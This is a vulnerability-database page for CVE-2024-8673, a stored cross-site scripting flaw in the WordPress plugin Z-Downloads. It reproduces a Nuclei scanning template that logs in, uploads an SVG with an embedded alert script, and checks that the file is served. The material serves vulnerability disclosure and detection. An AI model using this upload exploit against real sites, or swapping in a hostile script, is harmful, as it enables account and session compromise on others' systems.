CVE-2024-8673: Z-Downloads < 1.11.7 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Z-Downloads | POC: 已公开

漏洞描述

The plugin does not properly validate uploaded files allowing for the uploading of SVGs containing malicious JavaScript.

PoC代码[已公开]

id: CVE-2024-8673

info:
  name: Z-Downloads < 1.11.7 - Cross-Site Scripting
  author: Splint3r7
  severity: low
  description: |
    The plugin does not properly validate uploaded files allowing for the uploading of SVGs containing malicious JavaScript.
  remediation: Fixed in version 1.11.7
  reference:
    - https://wpscan.com/vulnerability/fed2cd26-7ccb-419d-b589-978410953bf4/
  classification:
    cve-id: CVE-2024-8673
    cvss-score: 3.5
    cwe-id: CWE-79
    epss-score: 0.06683
    epss-percentile: 0.90882
  metadata:
    verified: true
    max-request: 5
    framework: wordpress
  tags: cve,cve2024,wpscan,wp-plugin,wp,authenticated,wordpress,z-downloads,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=z-downloads-add-file HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="nonce" value="([0-9a-zA-Z]+)"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------191511049038951322013765412437

        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="file"; filename="xss.svg"
        Content-Type: image/svg+xml

        <svg xmlns="http://www.w3.org/2000/svg">
        <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
        <script type="text/javascript">alert(document.domain);</script>
        </svg>

        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="nonce"

        {{nonce}}
        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="submit"

        Upload
        -----------------------------191511049038951322013765412437--

      - |
        GET /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /{{payloadurl}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_5 == 200
          - contains(content_type_5, "image/svg+xml")
          - contains(body_5, "<script type=\"text/javascript\">alert(document.domain);</script>")
        condition: and

    extractors:
      - type: regex
        name: payloadurl
        part: body
        regex:
          - /wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss\.svg
        internal: true
# digest: 4b0a0048304602210082c1f640a742d7b23e1ff0eba46cdfc2e8a7e09b6f6a862f7c8e0b9d4c5abbd6022100b51e0151b222f47d787493ce2981c581ffc084b6abdad7bbab65e171910c1af8:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8673.yaml

相关漏洞推荐